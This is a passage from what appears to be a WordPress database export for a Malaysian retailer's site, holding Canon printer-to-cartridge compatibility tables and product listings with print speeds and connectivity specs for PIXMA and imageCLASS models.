(Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP996</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MX308</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX328</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX338</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX347</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX366</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX426</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX876</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX886</p></td><td width=\"208\"><p>CLI-726 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-725 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-1</p></td><td width=\"208\"><p>PGI-29 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Dark Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Yellow)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-10</p></td><td width=\"208\"><p>PGI-72 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-100</p></td><td width=\"208\"><p>CLI-42 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA TR8570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS207</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS307</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5070</p></td><td width=\"208\"><p>CLI-771 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5170</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA TS8270</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9170</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr></tbody></table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2019-09-24 15:34:03','2019-09-24 07:34:03','',1449,'https://bintara.com.my/blog/2019/09/24/1449-revision-v1/',0,'revision','',0),(3293,1,'2019-09-24 15:37:00','2019-09-24 07:37:00','<h2>Injet Printers :-</h2>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto DuplexÂ Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><p>Â </p><p>Â </p><center>[maxbutton id=\"11\" ]</center><p>Â </p>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing\nThis compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.\nPrint, Scan, Copy, Fax\nISO standard print speed (A4): 8.8ipm black / 4.4ipm colour\nHi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct\nRecommended print volume: 50 - 200 pages\n<center></center><center>\n[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><p>&lt;center&gt;[maxbutton id=\"11\" ]&lt;/center&gt;</p>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h3>Laser Printers :-</h3>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<h4>Compact with wireless connectivity</h4><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p><p>Keep printing simple. The 